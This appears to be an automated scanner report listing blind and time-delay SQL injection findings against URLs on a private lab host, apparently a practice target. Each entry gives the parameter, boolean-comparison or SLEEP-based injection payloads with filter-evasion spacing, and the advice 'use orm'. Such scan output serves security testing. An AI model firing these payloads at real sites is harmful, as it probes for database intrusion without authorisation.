Target: http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'28405'='28405
'	and	'46950'='46950
'	or	52985=52985#
'	and	'93129'='93130
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example1.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'28405'='28405
'	and	'46950'='46950
'	or	52985=52985#
'	and	'93129'='93130
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example5.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	26941=26941
	and	39580=39580
	or	32878=32878#
	and	39575=39576
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example4.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	26941=26941
	and	39580=39580
	or	32878=32878#
	and	39575=39576
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example6.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	26941=26941
	and	39580=39580
	or	32878=32878#
	and	39575=39576
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example3.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '/**/and/**/'1003'='1003
'/**/and/**/'56367'='56367
'/**/or/**/30188=30188#
'/**/and/**/'89409'='89410
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example7.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 
and
41334=41334

and
48434=48434

or
31060=31060#

and
71819=71820
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/xml/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'hacker'}
Payload: '+and+'93514'='93514
'+and+'51105'='51105
'+or+3930=3930#
'+and+'77404'='77405
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example100.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'28405'='28405
'	and	'46950'='46950
'	or	52985=52985#
'	and	'93129'='93130
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example101.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'28405'='28405
'	and	'46950'='46950
'	or	52985=52985#
'	and	'93129'='93130
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example103.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'28405'='28405
'	and	'46950'='46950
'	or	52985=52985#
'	and	'93129'='93130
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example102.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'28405'='28405
'	and	'46950'='46950
'	or	52985=52985#
'	and	'93129'='93130
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example105.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'28405'='28405
'	and	'46950'='46950
'	or	52985=52985#
'	and	'93129'='93130
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example104.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'28405'='28405
'	and	'46950'='46950
'	or	52985=52985#
'	and	'93129'='93130
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example106.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'28405'='28405
'	and	'46950'='46950
'	or	52985=52985#
'	and	'93129'='93130
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example107.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'28405'='28405
'	and	'46950'='46950
'	or	52985=52985#
'	and	'93129'='93130
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example108.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'28405'='28405
'	and	'46950'='46950
'	or	52985=52985#
'	and	'93129'='93130
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example109.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'28405'='28405
'	and	'46950'='46950
'	or	52985=52985#
'	and	'93129'='93130
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example110.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'28405'='28405
'	and	'46950'='46950
'	or	52985=52985#
'	and	'93129'='93130
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example111.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'28405'='28405
'	and	'46950'='46950
'	or	52985=52985#
'	and	'93129'='93130
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example112.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'28405'='28405
'	and	'46950'='46950
'	or	52985=52985#
'	and	'93129'='93130
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example114.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'28405'='28405
'	and	'46950'='46950
'	or	52985=52985#
'	and	'93129'='93130
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example113.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'28405'='28405
'	and	'46950'='46950
'	or	52985=52985#
'	and	'93129'='93130
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example116.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'28405'='28405
'	and	'46950'='46950
'	or	52985=52985#
'	and	'93129'='93130
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example115.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'28405'='28405
'	and	'46950'='46950
'	or	52985=52985#
'	and	'93129'='93130
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example117.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'28405'='28405
'	and	'46950'='46950
'	or	52985=52985#
'	and	'93129'='93130
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example118.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'28405'='28405
'	and	'46950'='46950
'	or	52985=52985#
'	and	'93129'='93130
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example119.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'28405'='28405
'	and	'46950'='46950
'	or	52985=52985#
'	and	'93129'='93130
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example121.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'28405'='28405
'	and	'46950'='46950
'	or	52985=52985#
'	and	'93129'='93130
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example120.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'28405'='28405
'	and	'46950'='46950
'	or	52985=52985#
'	and	'93129'='93130
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example9.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload:  or SLEEP(3);-- 
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example8.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload: ` or SLEEP(3);-- 
Advice: use orm
Database: unknown
---